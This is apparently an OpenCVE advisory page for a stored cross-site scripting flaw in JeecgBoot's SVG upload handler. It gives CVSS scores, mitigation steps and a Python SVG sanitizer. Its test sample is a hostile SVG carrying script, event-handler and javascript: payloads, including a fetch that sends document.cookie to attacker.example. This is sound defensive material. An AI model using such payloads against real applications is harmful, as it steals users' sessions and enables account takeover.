Description
A vulnerability was detected in JeecgBoot up to 3.9.1. The affected element is an unknown function of the file jeecg-module-system/jeecg-system-biz/src/main/java/org/jeecg/modules/system/controller/CommonController.java of the component SVG File Handler. The manipulation results in cross site scripting. The attack can be executed remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
Published: 2026-05-09
Score: 5.3 Medium
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

A stored cross-site scripting flaw exists in JeecgBoot's SVG file handler, in an unspecified function of CommonController.java (component "SVG File Handler"). SVG is XML and can carry <script> elements, event-handler attributes such as onload, and javascript: URLs, so a crafted SVG that the application accepts and later serves back executes attacker-controlled JavaScript in the browser of any user who opens the stored file directly in the application's origin. From there the script can read cookies not flagged HttpOnly, act on the application as the victim, deface the interface, or redirect to attacker-controlled sites. The CVSS vectors record required user interaction (UI:R in 3.x, UI:P in 4.0): a victim must open, or be lured to, the uploaded file.

Affected Systems

JeecgBoot up to and including version 3.9.1, specifically the SVG handling code in jeecg-module-system/jeecg-system-biz/src/main/java/org/jeecg/modules/system/controller/CommonController.java. No other versions are listed as affected. The vendor was contacted before disclosure and did not respond, and no fixed release is known at the time of publication.

Risk and Exploitability

The 5.3 score is the CVSS 4.0 base score; the CVSS 3.0/3.1 vectors on this page give 4.3. All of them rate the integrity impact as low with no confidentiality or availability impact. The EPSS probability is below 1% and the CVE is not listed in the CISA KEV catalog, but the VulDB description states that exploit code is public (E:P in every vector). The attack is network-reachable and needs no privileges (AV:N, PR:N), yet it does require user interaction: a victim must open the crafted SVG, typically by following a link to the stored file. Exposure is therefore highest on installations reachable from untrusted networks where low-privilege or anonymous users can upload files and other users can be induced to view them.

Generated by OpenCVE AI on May 9, 2026 at 21:20 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Validate uploads by content, not by declared MIME type or file extension: parse the file as XML, require an <svg> root element, reject DOCTYPE and entity declarations, and enforce a strict size limit. Where SVG is not needed, refuse it and accept raster formats only.
  • Sanitize accepted SVG server-side before it is stored: drop <script>, <foreignObject> and <style> elements, every on* event-handler attribute, and href/xlink:href values using javascript: or data: schemes.
  • Serve user-uploaded SVG from a separate origin or as a download (Content-Disposition: attachment), with a Content-Security-Policy sandbox header on the file response itself. A page-level CSP does not apply when the SVG is opened directly, and SVG embedded through <img> never runs script; the exposure is a direct navigation to the stored file.
  • Monitor web and upload logs for SVG uploads containing <script>, on* attributes or javascript: URLs, and for unusual direct requests to uploaded SVG paths.
  • Apply a vendor patch or fixed release of JeecgBoot as soon as one is available; none is known at the time of writing.
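The controls in the list above, as an added example that is not JeecgBoot's own code (Python rather than the project's Java, so the logic can be run as-is): a server-side SVG sanitizer that refuses DOCTYPE/entity input, strips script elements, event-handler attributes and unsafe href and style values, and reports what it removed so the upload can be logged or rejected, plus the response headers a stored SVG should be served with. The function names, the allow/deny lists and the sample SVG are this example's own constructions.

```python
"""Server-side hardening for user-uploaded SVG: reject, sanitize, and serve safely.

Added example; not code from JeecgBoot. Function names, the allow/deny lists
and the sample SVG are this example's own constructions.
"""
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
ET.register_namespace("", SVG_NS)          # serialise <svg> without an ns0: prefix
ET.register_namespace("xlink", XLINK_NS)

MAX_SVG_BYTES = 512 * 1024

# Elements that execute script, embed HTML/CSS, or can animate an href; removed with their subtree.
ACTIVE_ELEMENTS = {"script", "foreignObject", "style", "set", "animate", "animateTransform"}
# href / xlink:href values that survive: fragment references and plain http(s) links only.
SAFE_URL = re.compile(r"^(#|https?://)", re.I)
# style attributes that fetch external resources or (in legacy engines) execute.
DANGEROUS_CSS = re.compile(r"url\s*\(|expression\s*\(|@import|javascript:", re.I)


def _local(qname: str) -> str:
    """Strip the {namespace} prefix ElementTree puts on tag and attribute names."""
    return qname.rsplit("}", 1)[-1]


def _scrub(elem: ET.Element, removed: list) -> None:
    tag = _local(elem.tag)
    for attr in list(elem.attrib):
        name = _local(attr)
        value = elem.attrib[attr].strip()
        if name.lower().startswith("on"):                     # onload=, onclick=, ...
            removed.append(f"{tag}@{name}")
            del elem.attrib[attr]
        elif name == "href" and not SAFE_URL.match(value):   # javascript:, data:, ...
            removed.append(f"{tag}@{name}")
            del elem.attrib[attr]
        elif name == "style" and DANGEROUS_CSS.search(value):
            removed.append(f"{tag}@{name}")
            del elem.attrib[attr]
    for child in list(elem):
        if _local(child.tag) in ACTIVE_ELEMENTS:
            removed.append(f"<{_local(child.tag)}>")
            elem.remove(child)
        else:
            _scrub(child, removed)


def sanitize_svg(svg: str) -> tuple:
    """Return (clean_svg, removed) or raise ValueError for input that is not plain SVG.

    `removed` lists every element/attribute dropped, so the caller can log the
    upload as suspicious or reject it instead of storing the cleaned copy.
    """
    if len(svg.encode()) > MAX_SVG_BYTES:
        raise ValueError("SVG exceeds size limit")
    # Entity declarations are never legitimate in an icon; refusing them up front also
    # keeps ElementTree from expanding internal entities (billion-laughs style input).
    if re.search(r"<!DOCTYPE|<!ENTITY", svg, re.I):
        raise ValueError("DOCTYPE/ENTITY declarations are not accepted")
    root = ET.fromstring(svg)
    if _local(root.tag) != "svg":
        raise ValueError("root element is not <svg>")
    removed = []
    _scrub(root, removed)
    return ET.tostring(root, encoding="unicode"), removed


def svg_response_headers(filename: str) -> dict:
    """Headers for serving a stored SVG. The sandbox CSP sits on the file response itself
    (a page-level CSP does not cover a direct navigation to the file), and
    Content-Disposition: attachment stops navigations from rendering it in the
    application origin while <img src=...> embedding keeps working."""
    safe_name = re.sub(r"[^\w.-]", "_", filename)
    return {
        "Content-Type": "image/svg+xml",
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "sandbox; default-src 'none'; style-src 'unsafe-inline'",
        "Content-Disposition": f'attachment; filename="{safe_name}"',
    }


# Constructed sample: the payload kinds a hostile upload would carry, not a real exploit file.
MALICIOUS_SVG = """<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
     width="100" height="100" onload="alert(document.cookie)">
  <script>fetch('https://attacker.example/?c=' + document.cookie)</script>
  <a xlink:href="javascript:alert(1)"><rect width="100" height="100" fill="red"/></a>
  <use href="#logo" onclick="alert(2)"/>
  <image href="data:text/html,&lt;script&gt;alert(3)&lt;/script&gt;" width="10" height="10"/>
  <circle cx="50" cy="50" r="10" style="fill:url(https://attacker.example/leak.svg#g)"/>
  <foreignObject><body xmlns="http://www.w3.org/1999/xhtml"><img src="x" onerror="alert(5)"/></body></foreignObject>
</svg>"""

if __name__ == "__main__":
    clean, removed = sanitize_svg(MALICIOUS_SVG)
    print("removed:", removed)
    print(clean)
    print(svg_response_headers("logo.svg"))
```

The header function is the control that matters most: browsers only execute script in an SVG on a direct navigation to it, never when it is embedded via <img> or CSS, so serving uploads as attachments (or from a separate origin) closes the XSS path even for files the sanitizer misses. The sanitizer is defence in depth; a non-empty `removed` list on upload is the signal worth logging or treating as grounds for rejection. In a Java code base the same checks map onto a DOM or SAX filter applied before the file is written to storage.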

Advisories

No advisories yet.

History

Sat, 09 May 2026 20:15:00 +0000

Type Values Removed Values Added
Description A vulnerability was detected in JeecgBoot up to 3.9.1. The affected element is an unknown function of the file jeecg-module-system/jeecg-system-biz/src/main/java/org/jeecg/modules/system/controller/CommonController.java of the component SVG File Handler. The manipulation results in cross site scripting. The attack can be executed remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
Title JeecgBoot SVG File CommonController.java cross site scripting
Weaknesses CWE-79
CWE-94
References
Metrics cvssV2_0

{'score': 5, 'vector': 'AV:N/AC:L/Au:N/C:N/I:P/A:N/E:POC/RL:ND/RC:UR'}

cvssV3_0

{'score': 4.3, 'vector': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R'}

cvssV3_1

{'score': 4.3, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R'}

cvssV4_0

{'score': 5.3, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P'}


MITRE

Status: PUBLISHED

Assigner: VulDB

Published:

Updated: 2026-05-09T20:00:11.428Z

Reserved: 2026-05-08T20:14:18.538Z

Link: CVE-2026-8195

Vulnrichment

No data.

NVD

Status : Received

Published: 2026-05-09T20:16:30.517

Modified: 2026-05-09T20:16:30.517

Link: CVE-2026-8195

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-05-09T21:30:42Z

Weaknesses